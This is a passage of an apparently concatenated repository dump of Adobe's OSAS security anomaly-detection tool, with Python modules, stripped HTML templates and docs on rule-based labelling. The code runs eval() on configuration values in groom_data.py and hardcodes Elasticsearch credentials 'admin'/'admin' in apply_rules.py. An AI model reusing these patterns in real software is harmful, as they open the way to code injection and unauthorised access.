43 | permanently any contributor for other behaviors that they deem inappropriate,
44 | threatening, offensive, or harmful.
45 |
46 | ## Scope
47 |
48 | This Code of Conduct applies both within project spaces and in public spaces
49 | when an individual is representing the project or its community. Examples of
50 | representing a project or community include using an official project e-mail
51 | address, posting via an official social media account, or acting as an appointed
52 | representative at an online or offline event. Representation of a project may be
53 | further defined and clarified by project maintainers.
54 |
55 | ## Enforcement
56 |
57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be
58 | reported by contacting the project team at Grp-opensourceoffice@adobe.com. All
59 | complaints will be reviewed and investigated and will result in a response that
60 | is deemed necessary and appropriate to the circumstances. The project team is
61 | obligated to maintain confidentiality with regard to the reporter of an incident.
62 | Further details of specific enforcement policies may be posted separately.
63 |
64 | Project maintainers who do not follow or enforce the Code of Conduct in good
65 | faith may face temporary or permanent repercussions as determined by other
66 | members of the project's leadership.
67 |
68 | ## Attribution
69 |
70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
71 | available at [http://contributor-covenant.org/version/1/4][version]
72 |
73 | [homepage]: http://contributor-covenant.org
74 | [version]: http://contributor-covenant.org/version/1/4/
75 |
--------------------------------------------------------------------------------
/src/osas/templates/config_manual_update.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
15 |
16 |
17 |
18 | {% if not input %}
19 |
Available config files in tests folder:
20 | {% endif %}
21 |
22 | {% if input %}
23 |
Selected config:
24 | {% endif %}
25 |
26 | {% if not input %}
27 | {%for i in range(0, len)%}
28 |
29 |
{{files[i]}}
30 | {%endfor%}
31 | {% endif %}
32 | {% if not input %}
33 |
Please input a valid config file from the list above
34 | {% endif %}
35 |
111 |
112 |
113 |
114 |
--------------------------------------------------------------------------------
/src/osas/pipeline/groom_data.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import os
20 | import sys
21 | import json
22 |
23 | sys.path.append('')
24 |
25 | # from osas.pipeline.pipeline import Pipeline
26 | from osas.core import label_generators
27 | from osas.io_utils import config
28 | from osas.core.interfaces import LabelGenerator, Datasource
29 | import configparser
30 |
31 |
32 | class GroomData():
33 | ''' class for data grooming wrapper methods '''
34 |
35 | def __init__(self, env: str = 'DEV'):
36 | # Pipeline.__init__(self, env)
37 | os.environ["OSAS_ENV"] = env
38 |
39 | def label_generator(self, name: str,
40 | load_config: str = None) -> LabelGenerator:
41 | '''generate label specified by name'''
42 | # get label generator class from name
43 | lgClass = getattr(sys.modules[label_generators.__name__], name)
44 | # get args for the label generator
45 | cfg = getattr(sys.modules[config.__name__], name)()
46 | if load_config:
47 | if isinstance(load_config, configparser.SectionProxy):
48 | cfg = load_config
49 | else:
50 | cfg.load(load_config)
51 | # get label gen obj
52 | # di = {key: eval(cfg[key]) for key in cfg}
53 | di = {}
54 | for key in cfg:
55 | try:
56 | val = eval(cfg[key])
57 | except:
58 | val = cfg[key]
59 | di[key] = val
60 | del di['generator_type']
61 | lg = lgClass(**di) # convert obj to dict to kwargs
62 | return lg
63 |
64 | def from_pretrained(self, name: str,
65 | pretrained: dict) -> LabelGenerator:
66 | '''generate label specified by name'''
67 | # get label generator class from name
68 | lgClass = getattr(sys.modules[label_generators.__name__], name)
69 | # get args for the label generator
70 | cfg = getattr(sys.modules[config.__name__], name)()
71 | return lgClass.from_pretrained(json.dumps(pretrained))
72 | # if load_config:
73 | # if isinstance(load_config, configparser.SectionProxy):
74 | # cfg = load_config
75 | # else:
76 | # cfg.load(load_config)
77 | # # get label gen obj
78 | # # di = {key: eval(cfg[key]) for key in cfg}
79 | # di = {}
80 | # for key in cfg:
81 | # try:
82 | # val = eval(cfg[key])
83 | # except:
84 | # val = cfg[key]
85 | # di[key] = val
86 | # del di['generator_type']
87 | # lg = lgClass(**di) # convert obj to dict to kwargs
88 | # return lg
89 |
90 | def build_model(self, model: LabelGenerator,
91 | dataset: Datasource, count_column: str) -> dict:
92 | return model.build_model(dataset, count_column)
93 |
94 | def get_labels(self, model: LabelGenerator,
95 |                    input_object: dict) -> list[str]:
96 | return model.__call__(input_object)
97 |
98 | def get_pretrained_model(self, modelName: str,
99 | pretrained_data: str) -> LabelGenerator:
100 | lgClass = getattr(sys.modules[label_generators.__name__],
101 | modelName)
102 | return lgClass.from_pretrained(pretrained_data)
103 |
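# Illustrative usage (the section name, config path and input row are assumptions;
# passing a configparser section that contains a 'generator_type' key mirrors how the
# pipeline drives label_generator()):
#
#   import configparser
#   conf = configparser.ConfigParser()
#   conf.read('tests/model.conf')
#   gd = GroomData('DEV')
#   lg = gd.label_generator(conf['UserLabels']['generator_type'], conf['UserLabels'])
#   labels = gd.get_labels(lg, {'user': 'privileged@system'})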
--------------------------------------------------------------------------------
/src/osas/templates/console.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
136 |
137 |
--------------------------------------------------------------------------------
/src/osas/api.py:
--------------------------------------------------------------------------------
1 | import configparser
2 | import sys
3 | import hashlib
4 | import io
5 | import json
6 | import time
7 |
8 | sys.path.append('')
9 |
10 | from src.osas.pipeline import Pipeline
11 | from src.osas.pipeline import DetectAnomalies
12 | from src.osas.pipeline import GroomData
13 |
14 |
15 | class OSASConfig:
16 | def __init__(self, configparser: configparser.ConfigParser):
17 | '''
18 | Create a new instance of OSAS configuration. If you don't want to manually use configparser to parse the input, use one of the helper methods: from_file or from_string
19 | @param configparser - instance of type RawConfigParser
20 | '''
21 | self._config = configparser
22 | # compute md5 of conf file
23 | bw = io.StringIO()
24 | configparser.write(bw)
25 | bw.flush()
26 | bw.seek(0)
27 | bb = bw.read().encode('utf-8')
28 | self._md5 = hashlib.md5(bb).hexdigest()
29 |
30 | @staticmethod
31 | def from_file(filename: str):
32 | '''
33 | Create a new config instance using the specified filename
34 |
35 | @param filename: path to file
36 | '''
37 |
38 | cfg = configparser.ConfigParser()
39 | with open(filename, 'r') as f:
40 | cfg.read_file(f)
41 |
42 | oc = OSASConfig(cfg)
43 | return oc
44 |
45 | @staticmethod
46 | def from_string(string: str):
47 | '''
48 | Create a new config instance using the specified configuration string
49 |
50 | @param string: configuration string
51 | '''
52 | cfg = configparser.RawConfigParser()
53 | cfg.read_string(string)
54 | oc = OSASConfig(cfg)
55 | return oc
56 |
57 | def md5(self):
58 | return self._md5
59 |
60 | @property
61 | def config(self):
62 | return self._config
63 |
64 |
65 | class OSASPretrainedModel:
66 | def __init__(self, string: str):
67 | self._json = json.loads(string)
68 | self._md5 = hashlib.md5(string.encode('utf-8')).hexdigest()
69 |
70 | @staticmethod
71 | def from_file(filename: str):
72 | return OSASPretrainedModel(open(filename).read())
73 |
74 | @staticmethod
75 | def from_string(string: str):
76 | return OSASPretrainedModel(string)
77 |
78 | def md5(self):
79 | return self._md5
80 |
81 | @property
82 | def json(self):
83 | return self._json
84 |
85 |
86 | osas_instances = {}
87 |
88 |
89 | class OSAS:
90 | def __init__(self, conf: OSASConfig, model: OSASPretrainedModel):
91 | self._pipeline = []
92 | gd = GroomData()
93 | scoring_model_name = conf.config['AnomalyScoring']['scoring_algorithm']
94 | for sect in conf.config:
95 | if 'generator_type' in conf.config[sect]:
96 | self._pipeline.append(gd.from_pretrained(conf.config[sect]['generator_type'],
97 | model.json['model'][sect]))
98 | da = DetectAnomalies()
99 | self._detect_anomalies = da.get_pretrained_model(scoring_model_name, json.dumps(model.json['scoring']))
100 |
101 | @staticmethod
102 | def get_instance(conf: OSASConfig, model: OSASPretrainedModel):
103 | total_hash = '{0}_{1}'.format(conf.md5(), model.md5())
104 | if total_hash not in osas_instances:
105 | osas_instance = OSAS(conf, model)
106 | osas_instances[total_hash] = osas_instance
107 | return osas_instance
108 | else:
109 | return osas_instances[total_hash]
110 |
111 | def __call__(self, row_dict: dict):
112 | label_list = []
113 | for lg in self._pipeline:
114 | llist = lg(row_dict)
115 | for label in llist:
116 | label_list.append(label)
117 | # create a dummy entry
118 |
119 | dummy_ds = [{'_labels': label_list}]
120 | score = self._detect_anomalies(dummy_ds, verbose=False)
121 | return {
122 | 'labels': label_list,
123 | 'score': score
124 | }
125 |
126 |
127 | if __name__ == '__main__':
128 | cfg = OSASConfig.from_file('tests/model.conf')
129 | print(cfg.md5())
130 | mdl = OSASPretrainedModel.from_file('tests/model.json')
131 | print(mdl.md5())
132 | time_start = time.time()
133 | osas = OSAS.get_instance(cfg, mdl)
134 | time_first_call = time.time()
135 | osas = OSAS.get_instance(cfg, mdl)
136 | time_second_call = time.time()
137 | t1 = time_first_call - time_start
138 | t2 = time_second_call - time_first_call
139 | print("Initial instance creation took {0:.8f} seconds".format(t1))
140 | print("Second call took {0:.8f} seconds".format(t2))
141 | print("Speedup was {0:.3f}".format(t1 / t2))
142 | print(osas({
143 | 'countries': 'Somalia',
144 | }))
145 |
--------------------------------------------------------------------------------
/docs/RULES.md:
--------------------------------------------------------------------------------
1 | # Rule-based labeling and anomaly scoring
2 |
3 | Once you have a working pipeline, you might want to refine your results by adding human-expert knowledge about the dataset and the generated labels. Using static rules you can:
4 |
5 | * Add new labels to your dataset: for instance, to highlight when a special user (say `system@mydatabase.com`) seems to connect from non-standard countries;
6 | * Change the anomaly score by a relative value, based on specific attribute values or generated labels (for example, add 100 to the anomaly score when the above happens).
7 |
8 | For this, we provide another CLI tool (`osas/main/apply_rules.py`) that takes the previously labeled dataset and a folder containing the static rules as input, and writes the modified labels and anomaly scores to a new file:
9 |
10 | ```bash
11 | python osas/main/apply_rules.py --help
12 | Usage: apply_rules.py [options]
13 |
14 | Options:
15 | -h, --help show this help message and exit
16 | --input-file=INPUT_FILE
17 | location of the input file
18 | --rules-folder=RULES_FOLDER
19 | location of rules
20 | --output-file=OUTPUT_FILE
21 | output-file (optional)
22 | --no-elastic don't push data to Elastic
23 | ```
24 |
25 | **Parameters**
26 | * `--input-file`: path to a CSV file, **already processed** by `run_pipeline.py`
27 | * `--rules-folder`: path to a system folder containing the static rules in `.yaml` format
28 | * `--output-file`: where to store the results
29 | * `--no-elastic`: don't push data back to elastic (useful when OSAS is run outside the distributed Docker image)
30 |
31 | **Note:** OSAS will apply all the rules inside the folder.
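
For example, a typical invocation (file and folder names are illustrative) might look like this:

```bash
python osas/main/apply_rules.py --input-file corpus/scored_dataset.csv \
                                --rules-folder rules/ \
                                --output-file corpus/scored_dataset_rules.csv \
                                --no-elastic
```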
32 |
33 | ## The format of rule files
34 |
35 | If you are an impatient reader, you can skip this section and go straight to the example. Everything inside the rule files is self-explanatory and the practical example will probably clarify everything else.
36 |
37 | Rules are stored in `YAML` format and must be saved in files that have the `.yaml` extension.
38 | Each rule must contain the following mandatory attributes:
39 |
40 | * `rule name`: each rule must have a name (not necessarily unique)
41 | * `rule label`: what label you want to add if this specific rule is a match for one of the examples in your dataset
42 | * `rule score`: a floating-point value that will modify the original anomaly score.
43 | * `conditions`: a list of conditions that trigger this rule. The boolean operation between them is `OR`.
44 |
45 | Each condition has a free-form `label` (key) that is not used anywhere else, except for making the file readable to those who edit it. It is followed by a list of attribute names (columns in the CSV) with their possible value(s). The logical operator between attribute matches is `AND`, and the logical operator between the values of a single attribute is `OR`.
46 | Also, the attribute values are regular expressions, which allows for wildcards.
47 |
48 | ## Example
49 |
50 | Say you have a dataset that contains user logins with origin country, IP address (`host`) and timestamp. Also, your infrastructure has some automation that works by connecting to the server from a host with a known IP address (`10.10.10.10`) and user (`privileged@system`).
51 | Additionally, you used the knowledge-based label generator to create special labels that reflect the time of day (`EARLY_MORNING`, `EVENING`, `NIGHT`), and you know that the automation should only run at night.
52 |
53 | This is what such a rule would look like:
54 |
55 | ```yaml
56 | rule name: privileged login from unknown ip or outside normal hours
57 | rule label: DANGER_FOR_AUTOMATION_ACCOUNT
58 | rule score: +500
59 | conditions:
60 |   privileged_unknown_ip:
61 | host: ^((?!10.10.10.10).)*$
62 | username: privileged@system
63 | automation_outside_normal_hours:
64 | labels:
65 | - EARLY_MORNING
66 | - EVENING
67 | username: privileged@system
68 | ```
69 |
70 | Short explanation:
71 | 1. The rule name is `privileged login from unknown ip or outside normal hours`, indicating clearly what it does;
72 | 2. The label `DANGER_FOR_AUTOMATION_ACCOUNT` will get added to every example that matches this rule;
73 | 3. Every time the rule is matched, the anomaly score will get increased by 500;
74 | 4. The rule has two conditions that can be matched independently: `privileged_unknown_ip` and `automation_outside_normal_hours`. If either one of these conditions matches, the rule will get applied;
75 | 5. Condition 1 (`privileged_unknown_ip`) looks at the username and expects it to be `privileged@system`. Also, it requires the `host` value to be anything other than `10.10.10.10`;
76 | 6. Condition 2 (`automation_outside_normal_hours`) also looks at the username and expects it to be `privileged@system`. Additionally, it checks the labels for either of the two values specified in the list: `EARLY_MORNING` and `EVENING`.
77 |
78 | We hope that this explains the way rules are applied and how you can build the boolean logic around them.
79 |
80 | ## Tips and tricks
81 |
82 | **Tip 1:** The `rule score` is a modifier that can be positive or negative. Use positive values to highlight alerts, negative values to whitelist events, and 0 if you just want the rule label added; see the example below.
83 |
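For instance, a minimal whitelisting rule (all names and values below are illustrative) that follows the format described above could look like this:

```yaml
rule name: ignore known vulnerability scanner
rule label: KNOWN_SCANNER
rule score: -500
conditions:
  known_scanner_host:
    host: 10\.20\.30\.40
```
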
84 | **Tip 2:** If the attribute name is `labels`, then the condition will apply to the labels that OSAS added in the `run_pipeline.py` step.
85 |
86 |
87 |
--------------------------------------------------------------------------------
/src/osas/io_utils/config.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import sys
20 | import ast
21 | from builtins import object, super
22 | import collections
23 | import configparser
24 | import pandas as pd
25 | from dataclasses import dataclass, field
26 |
27 |
28 | @dataclass
29 | class Config(object):
30 | '''Generic base class to load/save config'''
31 |
32 | def _eval_str(self, s):
33 | '''convert type to actual type'''
34 | try:
35 | return ast.literal_eval(s)
36 | except:
37 | return s
38 |
39 | def save(self, filename):
40 | """Save configuration to file."""
41 | self.__config__ = self.__class__.__name__
42 | sorted_dict = collections.OrderedDict(sorted(self.__dict__.items()))
43 | # sort dictionary
44 | config = configparser.ConfigParser()
45 | config.add_section(self.__config__) # write header
46 | for k, v in sorted_dict.items(): # for python3 use .items()
47 | if not k.startswith("_"): # write only non-private properties
48 | if isinstance(v, float): # if we are dealing with a float
49 | str_v = str(v)
50 | if "e" not in str_v and "." not in str_v:
51 |                         # stop confusion with an int by appending a ".0"
52 |                         v = str_v + ".0"
53 |                 v = str(v)  # configparser.set() requires string values
54 | config.set(self.__config__, k, v)
55 |         with open(filename, 'w') as cfgfile:
56 | config.write(cfgfile)
57 |
58 | def load(self, filename):
59 | '''Load configuration from file'''
60 | __config__ = self.__class__.__name__
61 | config = configparser.ConfigParser()
62 | config.read(filename)
63 | # check to see if the config file has the appropriate section
64 | if not config.has_section(__config__):
65 | sys.stderr.write("ERROR: File:{} is not a valid configuration file"
66 | " for the selected task: Missing section:[{}]\n"
67 | .format(filename, __config__))
68 | sys.exit(1)
69 | for k, v in config.items(__config__):
70 | self.__dict__[k] = self._eval_str(v)
71 |
72 |
73 | # ****Beware****
74 | # Don't save secrets as default config
75 | # Use local config file (not git synced) to save secrets
76 |
77 |
78 | # ML data dataclasses
79 | @dataclass
80 | class CSVDataSource(Config):
81 | filename: str = field(default='corpus/test.csv')
82 |
83 |
84 | @dataclass
85 | class CSVDataColumn(Config):
86 | data: pd.DataFrame = field(default=pd.DataFrame())
87 |
88 |
89 | # Label Generator dataclasses
90 | @dataclass
91 | class ObfuscationField(Config):
92 | field_name: str = field(default='command')
93 | gpu: bool = field(default=False)
94 |
95 |
96 | @dataclass
97 | class NumericField(Config):
98 | field_name: str = field(default='count')
99 | group_by: str = field(default=None)
100 | mode: str = field(default='stdev')
101 | borderline_threshold: float = field(default=1)
102 | outlier_threshold: float = field(default=2)
103 | label_for_normal: bool = field(default=True)
104 |
105 |
106 | @dataclass
107 | class TextField(Config):
108 | field_name: str = field(default='command')
109 | lm_mode: str = field(default='char')
110 | ngram_range: tuple = field(default=(3, 5))
111 |
112 |
113 | @dataclass
114 | class MultinomialField(Config):
115 | field_name: str = field(default='user')
116 | absolute_threshold: int = field(default=10)
117 | relative_threshold: float = field(default=0.1)
118 | group_by: str = field(default=None)
119 |
120 |
121 | @dataclass
122 | class LOLField(Config):
123 | field_name: str = field(default='command')
124 | platform: str = field(default='linux')
125 |
126 |
127 | @dataclass
128 | class NumericalFieldCombiner(Config):
129 | field_names: list = field(default_factory=lambda: [])
130 | normalize: bool = field(default=True)
131 |
132 |
133 | @dataclass
134 | class MultinomialFieldCombiner(Config):
135 | field_names: list = field(default_factory=lambda: [])
136 | absolute_threshold: float = field(default=500)
137 | relative_threshold: float = field(default=0.005)
138 | group_by: str = field(default=None)
139 |
140 |
141 | @dataclass
142 | class KeywordBased(Config):
143 | keyword_list: list = field(default_factory=lambda: [])
144 | field_name: str = field(default='count')
145 |
146 |
147 | @dataclass
148 | class KnowledgeBased(Config):
149 | rules_and_labels_tuple_list: list = field(default_factory=lambda: [()])
150 | field_name: str = field(default='')
151 |
152 | # mfc = MultinomialFieldCombiner()
153 | # mfc.load('osas/etc/ad_config.conf')
154 | # print(vars(mfc))
155 |
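# Illustrative round-trip (file path is an assumption): any Config subclass can be
# saved to and re-loaded from an INI-style file whose section name matches the class name.
#
#   cfg = MultinomialField(field_name='user', absolute_threshold=20)
#   cfg.save('tests/multinomial_field.conf')
#   cfg2 = MultinomialField()
#   cfg2.load('tests/multinomial_field.conf')   # cfg2 now mirrors cfg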
--------------------------------------------------------------------------------
/src/osas/main/apply_rules.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2022 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import optparse
20 | import re
21 | import sys
22 |
23 | import tqdm
24 | from elasticsearch import helpers, Elasticsearch
25 |
26 | sys.path.append('')
27 |
28 | from osas.data.datasources import CSVDataSource, Datasource
29 | import yaml
30 | import os
31 |
32 |
33 | def is_numeric(obj):
34 | attrs = ['__add__', '__sub__', '__mul__', '__truediv__', '__pow__']
35 | return all(hasattr(obj, attr) for attr in attrs)
36 |
37 |
38 | def _get_all_yaml_files(root: str):
39 | all_files = []
40 | for path, subdirs, files in os.walk(root):
41 | for name in files:
42 | if name.endswith('.yaml'):
43 | all_files.append(os.path.join(path, name))
44 | return all_files
45 |
46 |
47 | def _load_rules(rules_folder: str) -> list:
48 | all_rule_files = _get_all_yaml_files(rules_folder)
49 | all_rules = []
50 | for file in all_rule_files:
51 | with open(file, 'r') as f:
52 | rules_pack = yaml.safe_load(f)
53 | if rules_pack is None:
54 | continue
55 | if 'rule name' not in rules_pack:
56 | sys.stdout.write('Invalid rule file {0}. Missing rule name\n'.format(file))
57 | sys.exit(0)
58 | if 'rule label' not in rules_pack:
59 | sys.stdout.write('Invalid rule file {0}. Missing rule label\n'.format(file))
60 | sys.exit(0)
61 | if 'rule score' not in rules_pack:
62 | sys.stdout.write('Invalid rule file {0}. Missing rule score\n'.format(file))
63 | sys.exit(0)
64 | all_rules.append(rules_pack)
65 | return all_rules
66 |
67 |
68 | def _apply_rules(datasource: Datasource, rules: list):
69 | scores = datasource['score']
70 | labels = datasource['labels']
71 | index = 0
72 | regex_cache = {}
73 | for item in tqdm.tqdm(datasource):
74 | for rule in rules:
75 | rule_name = rule['rule name']
76 | rule_score = float(rule['rule score'])
77 | rule_label = rule['rule label']
78 | cases = rule['conditions']
79 | for case in cases:
80 | valid = True
81 | for attribute_name in cases[case]:
82 | attribute_values = cases[case][attribute_name]
83 | if not isinstance(attribute_values, list):
84 | attribute_values = [attribute_values]
85 | if attribute_name not in item:
86 | sys.stdout.write('Your dataset does not contain "{0}"\n'.format(attribute_name))
87 | sys.exit(0)
88 | found = False
89 | for attribute_value in attribute_values:
90 | if attribute_value not in regex_cache:
91 | regex_cache[attribute_value] = re.compile(attribute_value)
92 | compiled_regex=regex_cache[attribute_value]
93 | if compiled_regex.match(item[attribute_name]):
94 | found = True
95 | break
96 | if not found:
97 | valid = False
98 | break
99 | if valid:
100 | scores[index] += rule_score
101 | if len(labels[index]) > 3:
102 | labels[index] = labels[index][:-1] + ', \'' + rule_label + '\']'
103 | else:
104 | labels[index] = '[\'{0}\']'.format(rule_label)
105 | index += 1
106 |
107 | datasource['_labels'] = labels
108 |
109 |
110 | def process(params):
111 | # load and run pipeline
112 | rules_pack = _load_rules(params.rules_folder)
113 | datasource = CSVDataSource(params.input_file)
114 | _apply_rules(datasource, rules_pack)
115 |
116 | # save, if necessary
117 | if params.output_file:
118 | datasource.save(open(params.output_file, 'w'))
119 | # push to elasticsearch
120 | if not params.no_elastic:
121 | try:
122 | es = Elasticsearch([{'host': 'localhost', 'port': 9200}], http_auth=('admin', 'admin'))
123 | data = [item for item in datasource]
124 | helpers.bulk(es, data, index="anomalies", doc_type="type")
125 | except Exception as e:
126 | sys.stdout.write('Unable to push data to ElasticSearch: {0}\n'.format(str(e)))
127 |
128 |
129 | if __name__ == '__main__':
130 | parser = optparse.OptionParser()
131 | parser.add_option('--input-file', action='store', dest='input_file', help='location of the input file')
132 | parser.add_option('--rules-folder', action='store', dest='rules_folder', help='location of rules')
133 | parser.add_option('--output-file', action='store', dest='output_file', help='output-file (optional)')
134 | parser.add_option('--no-elastic', action='store_true', dest='no_elastic', help='don\'t push data to Elastic')
135 | (params, _) = parser.parse_args(sys.argv)
136 |
137 | if params.input_file and params.rules_folder:
138 | if params.no_elastic and not params.output_file:
139 | sys.stdout.write("This run will not produce any results. You need to either specify --output-file or "
140 | "remove --no-elastic\n")
141 | else:
142 | process(params)
143 | else:
144 | parser.print_help()
145 |
--------------------------------------------------------------------------------
/src/osas/core/interfaces.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | from typing import Union, Any
20 | from abc import abstractmethod
21 |
22 |
23 | class DatasourceIterator:
24 | def __init__(self, datasource):
25 | self._ds = datasource
26 | self._index = 0
27 |
28 | def __next__(self):
29 | if self._index < len(self._ds):
30 | rez = self._ds[self._index]
31 | self._index += 1
32 | return rez
33 | else:
34 | raise StopIteration
35 |
36 |
37 | class DataColumn:
38 | def __init__(self):
39 | pass
40 |
41 | @abstractmethod
42 | def mean(self) -> float:
43 | """Computes mean for numerical columns"""
44 | pass
45 |
46 | @abstractmethod
47 | def std(self) -> float:
48 | """Computes standard deviation for numerical columns"""
49 | pass
50 |
51 | @abstractmethod
52 |     def min(self) -> Any:
53 |         """Computes minimum value for numerical columns"""
54 | pass
55 |
56 | @abstractmethod
57 |     def max(self) -> Any:
58 |         """Computes maximum value for numerical columns"""
59 | pass
60 |
61 | @abstractmethod
62 | def unique(self) -> list:
63 | """Computes unique values for columns"""
64 | pass
65 |
66 | @abstractmethod
67 | def value_counts(self) -> dict:
68 | """Computes histogram values for columns"""
69 | pass
70 |
71 | @abstractmethod
72 | def tolist(self) -> list:
73 |         """Returns the column values as a list"""
74 | pass
75 |
76 | @abstractmethod
77 | def apply(self, func) -> int:
78 | """
79 | Apply lambda function
80 | :param func: function to apply
81 | :return:
82 | """
83 | pass
84 |
85 | @abstractmethod
86 | def __len__(self) -> int:
87 | """Returns the number of items in the collection"""
88 | pass
89 |
90 | @abstractmethod
91 |     def __getitem__(self, index: int) -> Any:
92 |         """Returns the value at the given index
93 | :param index - the index of the element
94 | """
95 | pass
96 |
97 | @abstractmethod
98 | def __setitem__(self, index: int, value: Any) -> dict:
99 | """Sets the value for an item
100 | :param index - the index of the element
101 | """
102 | pass
103 |
104 | def __iter__(self):
105 | return DatasourceIterator(self)
106 |
107 |
108 | class Datasource:
109 | def __init__(self):
110 | pass
111 |
112 | @abstractmethod
113 | def __len__(self) -> int:
114 | """Returns the number of items in the collection"""
115 | pass
116 |
117 | @abstractmethod
118 | def __getitem__(self, index: int) -> dict:
119 | """Returns an item as a dictionary
120 | :param index - the index of the element
121 | """
122 | pass
123 |
124 | @abstractmethod
125 |     def __setitem__(self, key: str, value: Any):
126 | """
127 | Create or set a column
128 | :param key: column name
129 | :param value: values
130 | :return:
131 | """
132 | pass
133 |
134 | def __iter__(self):
135 | return DatasourceIterator(self)
136 |
137 | @abstractmethod
138 | def apply(self, func, axis: int = 0) -> int:
139 | """
140 | Apply lambda function
141 | :param func: function to apply
142 | :param axis: 0-column, 1-row; default=0
143 | :return:
144 | """
145 | pass
146 |
147 | @abstractmethod
148 | def save(self, file_handle) -> None:
149 | """
150 | Save the data into csv format
151 | :param file_handle: open file handle for writing
152 | :return: None
153 | """
154 |
155 |
156 | class LabelGenerator:
157 | def __init__(self):
158 | pass
159 |
160 | @abstractmethod
161 | def __call__(self, input_object: dict) -> [str]:
162 | """
163 | Generate specific labels for the dataset entry
164 | :param input_object: an entry in the dataset
165 | :return: list of labels generated for this input object
166 | """
167 | pass
168 |
169 | @abstractmethod
170 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
171 | """
172 |         This method should build a model from the input dataset
173 | :param dataset: the dataset used to generate the model
174 | :param count_column: use this column for clustered data. If not set, event count will be 1
175 | :return: This should be a json serializable object
176 | """
177 | pass
178 |
179 | @staticmethod
180 | def from_pretrained(pretrained: str) -> object:
181 | """
182 | :param pretrained: dictionary holding pretrained model
183 | :return: New instance
184 | """
185 | pass
186 |
187 |
188 | class AnomalyDetection:
189 | def __init__(self):
190 | pass
191 |
192 | @abstractmethod
193 | def build_model(self, dataset: Datasource, incremental: bool = False) -> dict:
194 | """
195 |         This method should build a model from the input dataset
196 | :param dataset: the dataset used to generate the model
197 | :param incremental: perform incremental update
198 | :return: This should be a json serializable object
199 | """
200 | pass
201 |
202 | @abstractmethod
203 | def __call__(self, dataset: Datasource, verbose=True) -> [float]:
204 | """
205 | Scores a dataset with anomaly scores
206 | :param dataset: the dataset to score
207 | :return: an anomaly score for each example in the dataset
208 | """
209 | pass
210 |
--------------------------------------------------------------------------------
/docs/PIPELINE_CONFIGURATION.md:
--------------------------------------------------------------------------------
1 | # Pipeline explained
2 |
3 | The pipeline sequentially applies all label generators on the raw data, collects the labels and uses an anomaly scoring algorithm to generate anomaly scores.
4 | There are two main component classes: LabelGenerator and ScoringAlgorithm.
5 |
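As a rough illustration of how the two kinds of components interact (a minimal sketch with made-up stand-in classes, not the actual OSAS API), every label generator maps a raw event to a set of labels, and the scoring algorithm turns each resulting label set into an anomaly score:

```python
# Toy stand-ins for the two component classes (illustrative only).

class UppercaseCommandLabeler:
    """Toy label generator: flags events whose 'command' field is all upper case."""
    def __call__(self, event: dict) -> list:
        return ['UPPERCASE_COMMAND'] if event.get('command', '').isupper() else []


class CountBasedScorer:
    """Toy scoring algorithm: the rarer a label set, the higher its anomaly score."""
    def __init__(self, all_label_sets):
        self._counts = {}
        for labels in all_label_sets:
            key = tuple(sorted(labels))
            self._counts[key] = self._counts.get(key, 0) + 1

    def __call__(self, labels: list) -> float:
        return 1.0 / self._counts[tuple(sorted(labels))]


events = [{'command': 'ls'}, {'command': 'PING'}, {'command': 'cat'}]
generators = [UppercaseCommandLabeler()]
label_sets = [[lbl for g in generators for lbl in g(event)] for event in events]
scorer = CountBasedScorer(label_sets)
print([(labels, scorer(labels)) for labels in label_sets])
```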
6 | ## Label generators
7 |
8 | **NumericField**
9 |
10 | * This type of LabelGenerator handles numerical fields. It can compute in two different ways: (1) the mean and standard deviation and generates labels
11 | according to the distance between the current value and the mean value (value<=sigma NORMAL, sigma<value<=2*sigma BORDERLINE, value>2*sigma OUTLIER)
32 | ```shell
